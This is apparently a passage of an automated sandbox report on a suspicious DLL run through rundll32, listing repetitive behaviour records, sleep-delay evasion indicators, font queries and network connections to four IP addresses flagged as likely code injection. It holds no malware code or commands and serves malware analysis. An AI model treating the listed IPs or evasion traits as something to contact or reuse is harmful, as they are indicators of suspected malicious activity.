                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 625Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 8444Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeWindow / User API: foregroundWindowGot 1772Jump to behavior
                        Source: C:\Windows\System32\loaddll64.exe TID: 5432Thread sleep time: -120000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\rundll32.exe TID: 7548Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\rundll32.exe TID: 7548Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\rundll32.exe TID: 1188Thread sleep time: -219000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\rundll32.exe TID: 1188Thread sleep time: -8444000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 104.26.12.205 80Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 88.198.193.213 443Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 3.33.130.190 80Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 34.120.206.254 443Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1Jump to behavior
                        Source: rundll32.exe, rundll32.exe, 00000006.00000002.1760309078.000001D941D42000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.1761110058.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1808931782.000001AB44DF2000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: Shell_TrayWnd
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
